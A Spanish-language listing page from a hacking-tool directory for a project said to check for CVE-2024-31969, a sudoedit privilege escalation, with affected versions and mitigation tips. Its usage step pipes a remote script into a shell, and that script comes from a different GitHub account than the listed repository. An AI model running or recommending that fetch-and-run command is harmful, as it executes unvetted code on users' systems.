Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-31969 — Proporciona un script de verificación de prueba de concepto y documentación para CVE-2024-31969, una escalada de privilegios local en sudoedit de sudo, incluyendo las versiones afectadas y orientación de mitigación. | Kitploit
Herramientas/GitHubGitHub/gmh5225/cve-2024-31969
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónAprendizaje y EducaciónRecursos Curados
GitHubgmh5225/cve-2024-31969

CVE-2024-31969

Proporciona un script de verificación de prueba de concepto y documentación para CVE-2024-31969, una escalada de privilegios local en sudoedit de sudo, incluyendo las versiones afectadas y orientación de mitigación.

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

📌 CVE-2024-31969

CVE-2024-31969 es una vulnerabilidad de escalada de privilegios local en sudo cuando se utiliza el comando sudoedit.

Esta vulnerabilidad se introdujo desde sudo 1.9.0 debido a la forma en que sudoedit valida las variables de entorno del usuario y la propiedad de los archivos de manera incorrecta.


📖 Descripción

A flaw introduced in sudo 1.9.0 in how sudoedit validated users' environment variables and file ownership.

Esta vulnerabilidad permite que un usuario local con acceso a sudoedit modifique archivos arbitrarios como root mediante la manipulación de variables de entorno como SUDO_EDITOR, o aprovechando symlinks.


📊 Versiones de Sudo Afectadas:

Versión de SudoEstado
1.9.0 → 1.9.15p4🔥 Vulnerable
1.9.15p5 en adelante✅ Seguro
1.8.x (incluida 1.8.23)❌ No afectada

📦 Instalación y Uso

Ejecute el siguiente comando:

root@kitploit:~
curl -L https://raw.githubusercontent.com/kingfakee7/CVE-2024-31969/main/cve-2024-31969-check.sh | sh

🛠️ Solución / Mitigación

  • Actualice sudo a la versión 1.9.15p5 o posterior.
  • Restrinja las reglas de sudoers que permiten sudoedit para usuarios no root.
  • Utilice una configuración segura de env_keep o env_reset en el archivo /etc/sudoers.

📚 Referencias

  • CVE-2024-31969 en NVD

⚠️ Aviso legal

Este repositorio se crea con fines educativos y de documentación de seguridad de sistemas.
Queda estrictamente prohibido utilizar esta información para actividades ilegales o sin autorización por escrito del propietario del sistema.
Cualquier forma de uso indebido es responsabilidad exclusiva del usuario.

Descargar herramienta